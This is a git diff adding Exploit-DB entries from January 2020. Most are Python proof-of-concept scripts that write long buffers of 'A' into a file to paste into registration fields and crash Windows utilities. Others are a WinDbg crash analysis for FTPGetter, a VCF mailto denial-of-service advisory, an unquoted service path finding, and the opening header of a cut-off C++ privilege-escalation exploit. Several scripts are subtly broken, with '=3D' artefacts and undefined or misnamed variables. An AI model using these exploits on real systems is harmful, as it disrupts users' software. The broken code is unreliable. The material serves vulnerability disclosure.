+6.Dnss Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47857.py b/exploits/windows/dos/47857.py new file mode 100755 index 000000000..888688818 --- /dev/null +++ b/exploits/windows/dos/47857.py @@ -0,0 +1,33 @@ +# Exploit Title: BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC) +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/blueauditor_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install BlueAuditor +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Name' and click on 'Ok' +6.BlueAuditor Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47859.py b/exploits/windows/dos/47859.py new file mode 100755 index 000000000..65d1339c1 --- /dev/null +++ b/exploits/windows/dos/47859.py @@ -0,0 +1,33 @@ +# Exploit Title: ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC) +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install ShareAlarmPro +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Key' and click on 'Ok' +6.ShareAlarmPro Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47860.py b/exploits/windows/dos/47860.py new file mode 100755 index 000000000..bd85284d3 --- /dev/null +++ b/exploits/windows/dos/47860.py @@ -0,0 +1,33 @@ +# Exploit Title: NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC) +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install NetShareWatcher +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Key' and click on 'Ok' +6.NetShareWatcher Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47861.py b/exploits/windows/dos/47861.py new file mode 100755 index 000000000..0ff878eae --- /dev/null +++ b/exploits/windows/dos/47861.py @@ -0,0 +1,33 @@ +# Exploit Title: Dnss Domain Name Search Software - 'Name' Denial of Service (PoC) +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install Dnss +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Name' and click on 'Ok' +6.Dnss Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47862.py b/exploits/windows/dos/47862.py new file mode 100755 index 000000000..1b84f60a3 --- /dev/null +++ b/exploits/windows/dos/47862.py @@ -0,0 +1,28 @@ +# Exploit Title: TextCrawler Pro3.1.1 - Denial of Service (PoC) +# Date: 2020-05-01 +# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html +# Software Link: https://www.digitalvolcano.co.uk/download/TextCrawlerPro=setup.exe +# Exploit Author: Achilles +# Tested Version: 3.1.1 +# Tested on: Windows 7 x64 + + +# 1.- Run python code :TextCrawler.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open TextCrawler Pro +# 4.- Paste the content of EVIL.txt into the Field: 'License key' +# 5.- Click 'Activate' and you will see a crash. + + + +#!/usr/bin/env python +buffer =3D "\x41" * 6000 + +try: +open("Evil.txt","w") +print "[+] Creating %s bytes evil payload.." %len(buffer) +f.write(buffer) +f.close() +print "[+] File created!" +except: +print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/47863.py b/exploits/windows/dos/47863.py new file mode 100755 index 000000000..4dbbe8e99 --- /dev/null +++ b/exploits/windows/dos/47863.py @@ -0,0 +1,33 @@ +# Exploit Title: RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC) +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install RemShutdown +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Key' and click on 'Ok' +6.RemShutdown Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47864.py b/exploits/windows/dos/47864.py new file mode 100755 index 000000000..62a2fb41a --- /dev/null +++ b/exploits/windows/dos/47864.py @@ -0,0 +1,33 @@ +# Exploit Title: Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC) +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install Backup Key Recovery +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Key' and click on 'Ok' +6.Backup Key Recovery Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47865.py b/exploits/windows/dos/47865.py new file mode 100755 index 000000000..8a107324c --- /dev/null +++ b/exploits/windows/dos/47865.py @@ -0,0 +1,33 @@ +# Exploit Title: RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC) +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install RemShutdown +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Name' and click on 'Ok' +6.RemShutdown Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47866.py b/exploits/windows/dos/47866.py new file mode 100755 index 000000000..665a507d9 --- /dev/null +++ b/exploits/windows/dos/47866.py @@ -0,0 +1,33 @@ +# Exploit Title: NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC) +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nbmonitor.com/downloads/nbmonitor_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install NBMonitor +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Key' and click on 'Ok' +6.NBMonitor Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47867.py b/exploits/windows/dos/47867.py new file mode 100755 index 000000000..ac906ffce --- /dev/null +++ b/exploits/windows/dos/47867.py @@ -0,0 +1,63 @@ +# Exploit Title: Office Product Key Finder 1.5.4 - Denial of Service (PoC) +# Date: 2020-01-06 +# Vendor Homepage: http://www.nsauditor.com/ +# Software Link: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe +# Exploit Author: Gokkul +# Tested Version: v1.5.4 +# Tested on: Windows 7 x64 + +# Software Description: +# Office Product Key Finder is offline product key finder software and allows to recover and +# find microsoft office 25 character product key for Microsoft Office 2013, Microsoft Office 2010, +# Microsoft Office 2007 and Microsoft Office 2003 installed on your PC or on network computers. + + +# 1.- Download and install Office Product Key Finder +# 2.- Run python code : Office Product Key Finder.py + +#!/usr/bin/env python +DoS=("\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41") + +myfile=open('CRASHER.txt','w') +myfile.writelines(Dos) +myfile.close() +print("File created") + +# 3.- Open CRASHER.txt and copy content to clipboard +# 4.- Open Office Product Key Finder and under the Register tab Click 'Enter Registration Code' +# 5.- Paste the content of CRASHER.txt into the Field: 'Name and Key' +# 6.- click 'OK' you will see a crash. \ No newline at end of file diff --git a/exploits/windows/dos/47868.py b/exploits/windows/dos/47868.py new file mode 100755 index 000000000..a5239e1ce --- /dev/null +++ b/exploits/windows/dos/47868.py @@ -0,0 +1,33 @@ +# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC) +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install SpotFTP +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Name' and click on 'Ok' +6.SpotFTP Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47869.py b/exploits/windows/dos/47869.py new file mode 100755 index 000000000..668c7ee0c --- /dev/null +++ b/exploits/windows/dos/47869.py @@ -0,0 +1,33 @@ +# Exploit Title: SpotMSN 2.4.6 - 'Name' Denial of Service (PoC) +# Exploit Author: Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/spotmsn_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install SpotMSN +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Name' and click on 'Ok' +6.SpotMSN Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47870.py b/exploits/windows/dos/47870.py new file mode 100755 index 000000000..0f4ab5542 --- /dev/null +++ b/exploits/windows/dos/47870.py @@ -0,0 +1,33 @@ +# Exploit Title: SpotIM 2.2 - 'Name' Denial Of Service +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/spotim_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install SpotIM +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Name' and click on 'Ok' +6.SpotIM Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47871.txt b/exploits/windows/dos/47871.txt new file mode 100644 index 000000000..f9e844205 --- /dev/null +++ b/exploits/windows/dos/47871.txt @@ -0,0 +1,153 @@ +# Exploit Title: FTPGetter Professional 5.97.0.223 - Denial of Service (PoC) +# Google Dork: N/A +# Date: 2020-01-03 +# Exploit Author: FULLSHADE +# Vendor Homepage: https://www.ftpgetter.com/ +# Software Link: https://www.ftpgetter.com/ftpgetter_pro_setup.exe +# Version: v.5.97.0.223 +# Tested on: Windows 7 +# CVE : N/A + +================================================================== +THE BUG : NULL pointer dereference -> DOS crash +================================================================== + +The FTPGetter Professional v.5.97.0.223 FTP client suffers from a +NULL pointer dereference vulnerability via the program not properly +handling user input when setting the field "Run program" under +profile properties, it triggers when executing the profile. + +================================================================== +DISCLOSURE : Vendor contacted : MITRE assignment : CVE-2020-5183 +================================================================== +... +... +================================================================== +WINDBG ANALYSIS AFTER SENDING 50,000 'A' BYTES +================================================================== + +(b84.e88): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=00000000 ebx=0255d3a0 ecx=04000000 edx=00000030 esi=00000000 edi=00000001 +eip=00855994 esp=0012fbd0 ebp=0012fc6c iopl=0 nv up ei pl zr na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 +*** ERROR: Symbol file could not be found. Defaulted to export symbols for FTPGetter.exe - +FTPGetter!Xtermforminitialization$qqrv+0x202d74: +00855994 8b5004 mov edx,dword ptr [eax+4] ds:0023:00000004=???????? + +0:000> !analyze -v +******************************************************************************* +* * +* Exception Analysis * +* * +******************************************************************************* + +*** ERROR: Symbol file could not be found. Defaulted to export symbols for ftpgcore.dll - +Failed calling InternetOpenUrl, GLE=12007 + +FAULTING_IP: +FTPGetter!Xtermforminitialization$qqrv+202d74 +00855994 8b5004 mov edx,dword ptr [eax+4] + +EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) +ExceptionAddress: 00855994 (FTPGetter!Xtermforminitialization$qqrv+0x00202d74) + ExceptionCode: c0000005 (Access violation) + ExceptionFlags: 00000000 +NumberParameters: 2 + Parameter[0]: 00000000 + Parameter[1]: 00000004 +Attempt to read from address 00000004 + +FAULTING_THREAD: 00000e88 + +PROCESS_NAME: FTPGetter.exe + +ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. + +EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. + +EXCEPTION_PARAMETER1: 00000000 + +EXCEPTION_PARAMETER2: 00000004 + +READ_ADDRESS: 00000004 + +FOLLOWUP_IP: +FTPGetter!Xtermforminitialization$qqrv+202d74 +00855994 8b5004 mov edx,dword ptr [eax+4] + +MOD_LIST: + +NTGLOBALFLAG: 0 + +APPLICATION_VERIFIER_FLAGS: 0 + +BUGCHECK_STR: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ + +PRIMARY_PROBLEM_CLASS: NULL_CLASS_PTR_DEREFERENCE + +DEFAULT_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE + +LAST_CONTROL_TRANSFER: from 00812591 to 00855994 + +STACK_TEXT: +WARNING: Stack unwind information not available. Following frames may be wrong. +0012fc6c 00812591 0085d350 0085d355 0046d181 FTPGetter!Xtermforminitialization$qqrv+0x202d74 +0012fc8c 0079ffc1 0012fd24 00000000 007a15c2 FTPGetter!Xtermforminitialization$qqrv+0x1bf971 +0012fcf8 007a2780 0012fdc8 007a278a 0012fd1c FTPGetter!Xtermforminitialization$qqrv+0x14d3a1 +0012fd1c 0068fda6 00000111 00000030 00000000 FTPGetter!Xtermforminitialization$qqrv+0x14fb60 +0012fd34 7688c267 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x3d186 +0012fd60 7688c367 00250f60 001f0320 00000111 user32!InternalCallWinProc+0x23 +0012fdd8 7688c999 00000000 00250f60 001f0320 user32!UserCallWinProcCheckWow+0x14b +0012fe38 7688c9f0 00250f60 00000000 001f0320 user32!DispatchMessageWorker+0x357 +0012fe48 007dec94 0012fe6c 00120100 0012feb8 user32!DispatchMessageW+0xf +0012fe64 007decd7 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x18c074 +0012fe88 007df016 0012fe9c 007df020 0012feb8 FTPGetter!Xtermforminitialization$qqrv+0x18c0b7 +0012feb8 00404674 00000000 00e75048 015c26bb FTPGetter!Xtermforminitialization$qqrv+0x18c3f6 +0012ff50 00aeae2b 00400000 00000000 015c26bb FTPGetter!_GetExceptDLLinfo+0x112f +0012ff88 7509ef3c 7ffdc000 0012ffd4 77003688 FTPGetter!madTraceProcess+0x3cef7 +0012ff94 77003688 7ffdc000 7702d7f0 00000000 kernel32!BaseThreadInitThunk+0xe +0012ffd4 7700365b 004034ec 7ffdc000 00000000 ntdll!__RtlUserThreadStart+0x70 +0012ffec 00000000 004034ec 7ffdc000 00000000 ntdll!_RtlUserThreadStart+0x1b + +SYMBOL_STACK_INDEX: 0 + +SYMBOL_NAME: ftpgetter!Xtermforminitialization$qqrv+202d74 + +FOLLOWUP_NAME: MachineOwner + +MODULE_NAME: FTPGetter + +IMAGE_NAME: FTPGetter.exe + +DEBUG_FLR_IMAGE_TIMESTAMP: 5dffa0bd + +STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s ; kb + +FAILURE_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE_c0000005_FTPGetter.exe!Xtermforminitialization$qqrv + +BUCKET_ID: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ_ftpgetter!Xtermforminitialization$qqrv+202d74 + +WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/FTPGetter_exe/5_97_0_221/5dffa0bd/FTPGetter_exe/5_97_0_221/5dffa0bd/c0000005/00455994.htm?Retriage=1 + +Followup: MachineOwner +--------- + +NULL pointer + +FOLLOWUP_IP: +REDftp!Xtermforminitialization$qqrv+202d74 +00855994 8b5004 mov edx,dword ptr [eax+4] + +Stepping into and running + +eax=04e8fc78 ebx=004db6b4 ecx=0000000a edx=41414141 esi=02871ae0 edi=00000000 +eip=004db97a esp=04e8fc74 ebp=04e8fec0 iopl=0 nv up ei pl nz ac pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216 +REDftp!GetFTPValidationW+0x6e842: +004db97a 837a5400 cmp dword ptr [edx+54h],0 ds:0023:41414195=???????? + +================================================================== +CVE-2020-5183 is a NULL pointer dereference vulnerability +================================================================== \ No newline at end of file diff --git a/exploits/windows/dos/47873.py b/exploits/windows/dos/47873.py new file mode 100755 index 000000000..089a7a53d --- /dev/null +++ b/exploits/windows/dos/47873.py @@ -0,0 +1,26 @@ +# Exploit Title: Duplicate Cleaner Pro 4 - Denial of Service (PoC) +# Date: 2020-01-05 +# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html +# Software Link: https://www.digitalvolcano.co.uk/download/DuplicateCleanerPro4_setup.exe +# Exploit Author: Achilles +# Tested Version: 4.1.3 +# Tested on: Windows 7 x64 + + +# 1.- Run python code : +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open Duplicate Cleaner Pro +# 4.- Paste the content of EVIL.txt into the Field: 'License key' +# 5.- Click 'Activate' and you will see a crash. + +#!/usr/bin/env python +buffer =3D "\x41" * 6000 + +try: +f.open("Evil.txt","w") +print "[+] Creating %s bytes evil payload.." %len(buffer) +f.write(buffer) +f.close() +print "[+] File created!" +except: +print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/47878.txt b/exploits/windows/dos/47878.txt new file mode 100644 index 000000000..e477d4cb1 --- /dev/null +++ b/exploits/windows/dos/47878.txt @@ -0,0 +1,93 @@ +# Exploit Title: Microsoft Outlook VCF cards - Denial of Service (PoC) +# Date: 2020-01-04 +# Exploit Author: hyp3rlinx +# Vendor Homepage: www.microsoft.com + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-MAILTO-LINK-DENIAL-OF-SERVICE.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.microsoft.com + + +[Product] +A VCF file is a standard file format for storing contact information for a person or business. +Microsoft Outlook supports the vCard and vCalendar features. +These are a powerful new approach to electronic Personal Data Interchange (PDI). + + +[Vulnerability Type] +Mailto Link Denial Of Service + + +[CVE Reference] +N/A + + +[Security Issue] +Windows VCF cards do not properly sanitize email addresses allowing for HTML injection. +A corrupt VCF card can cause all the users currently opened files and applications to be closed +and their session to be terminated without requiring any accompanying attacker supplied code. + +This can be done by crafting the Mailto link to point to Windows "logoff.exe". The corrupt VCF card can then +kill all users applications and also log the target off their computer, if the VCF card is opened in +using Windows Contacts and the link is clicked. + +The logoff.exe executable lives in "C:\Windows\System32" and can terminate applications and log out users without requiring args. + +This probably will affect Windows 7 the most as Windows 10 can possibly default opening VCF files in other programs +like (People). However, users can possibly still choose to open the VCF in Contacts by right-click the file. + +Note, this exploit requires user interaction. + +[Exploit/POC] +"VCF_DoS.py" + +dirty_vcf=( +'BEGIN:VCARD\n' +'VERSION:4.0\n' +'FN:Session Terminate PoC - ApparitionSec\n' +'EMAIL:DoS@microsoft.com\n' +'END:VCARD') + +f=open("DoS.vcf", "w") +f.write(dirty_vcf) +f.close() + +print "VCF Denial Of Service card created!" +print "By hyp3rlinx" + + +[POC Video URL] +https://www.youtube.com/watch?v=P4OGN7pZLSg + + +[Network Access] +Local + + +[Severity] +Medium + + +[Disclosure Timeline] +Vendor Notification: January 2, 2020 +MSRC : "In order to investigate your report I will need an explanation on how an attacker could use the information + to exploit another user remotely without the use of social engineering... As such, this thread is being closed" + : January 3, 2020 +January 4, 2020 : Public Disclosure + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/local/47852.txt b/exploits/windows/local/47852.txt new file mode 100644 index 000000000..16a30973f --- /dev/null +++ b/exploits/windows/local/47852.txt @@ -0,0 +1,24 @@ +#Exploit Title: Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path +#Exploit Author : ZwX +#Exploit Date: 2020-01-05 +#Vendor Homepage : http://webcompanion.com/ +#Link Software : http://webcompanion.com/LP-WC002/index.php?partner=LU150701WEBDIRECT&campaign=www.doc2pdf.com&search=2&homepage=2&bd=2 +#Tested on OS: Windows 10 + + +#Analyze PoC : +============== + +C:\Users\ZwX>sc qc WCAssistantService +[SC] QueryServiceConfig réussite(s) + +SERVICE_NAME: WCAssistantService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : WC Assistant + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/47880.cc b/exploits/windows/local/47880.cc new file mode 100644 index 000000000..f02ebcf47 --- /dev/null +++ b/exploits/windows/local/47880.cc @@ -0,0 +1,270 @@ +// Axel '0vercl0k' Souchet - December 28 2019 +// References: +// - Found by an anonymous researcher, written up by Simon '@HexKitchen' Zuckerbraun +// - https://www.zerodayinitiative.com/blog/2019/12/19/privilege-escalation-via-the-core-shell-com-registrar-object +// - https://github.com/microsoft/Windows-classic-samples/blob/master/Samples/Win7Samples/com/fundamentals/dcom/simple/sserver/sserver.cpp +// - 